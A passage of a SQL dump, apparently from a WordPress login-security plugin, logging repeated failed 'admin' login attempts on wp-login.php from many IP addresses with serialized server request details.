POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744961347.0068259;s:12:\"REQUEST_TIME\";i:1744961347;}}','185.2.4.103',0,'2025-04-18 12:59:10','1970-01-01 00:00:00'),(93772,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51074\";s:11:\"REMOTE_ADDR\";s:12:\"45.90.73.208\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744961997.9053619;s:12:\"REQUEST_TIME\";i:1744961997;}}','45.90.73.208',0,'2025-04-18 13:09:59','1970-01-01 00:00:00'),(93773,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39138\";s:11:\"REMOTE_ADDR\";s:14:\"103.169.35.190\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744962699.883146;s:12:\"REQUEST_TIME\";i:1744962699;}}','103.169.35.190',0,'2025-04-18 13:21:41','1970-01-01 00:00:00'),(93774,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59610\";s:11:\"REMOTE_ADDR\";s:14:\"95.217.147.111\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744963403.2472291;s:12:\"REQUEST_TIME\";i:1744963403;}}','95.217.147.111',0,'2025-04-18 13:33:25','1970-01-01 00:00:00'),(93775,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48314\";s:11:\"REMOTE_ADDR\";s:11:\"142.93.15.2\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744964099.693541;s:12:\"REQUEST_TIME\";i:1744964099;}}','142.93.15.2',0,'2025-04-18 13:45:01','1970-01-01 00:00:00'),(93776,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43522\";s:11:\"REMOTE_ADDR\";s:15:\"162.214.124.144\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744964796.412462;s:12:\"REQUEST_TIME\";i:1744964796;}}','162.214.124.144',0,'2025-04-18 13:56:38','1970-01-01 00:00:00'),(93777,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33450\";s:11:\"REMOTE_ADDR\";s:13:\"49.238.228.30\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744965495.10782;s:12:\"REQUEST_TIME\";i:1744965495;}}','49.238.228.30',0,'2025-04-18 14:08:16','1970-01-01 00:00:00'),(93778,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44324\";s:11:\"REMOTE_ADDR\";s:13:\"81.181.254.43\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744966195.557379;s:12:\"REQUEST_TIME\";i:1744966195;}}','81.181.254.43',0,'2025-04-18 14:19:57','1970-01-01 00:00:00'),(93779,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42956\";s:11:\"REMOTE_ADDR\";s:14:\"20.204.164.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744966897.545876;s:12:\"REQUEST_TIME\";i:1744966897;}}','20.204.164.126',0,'2025-04-18 14:31:39','1970-01-01 00:00:00'),(93780,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"17082\";s:11:\"REMOTE_ADDR\";s:13:\"83.149.93.194\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744967588.595993;s:12:\"REQUEST_TIME\";i:1744967588;}}','83.149.93.194',0,'2025-04-18 14:43:10','1970-01-01 00:00:00'),(93781,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46308\";s:11:\"REMOTE_ADDR\";s:13:\"178.32.112.62\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744968280.34131;s:12:\"REQUEST_TIME\";i:1744968280;}}','178.32.112.62',0,'2025-04-18 14:54:42','1970-01-01 00:00:00'),(93782,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 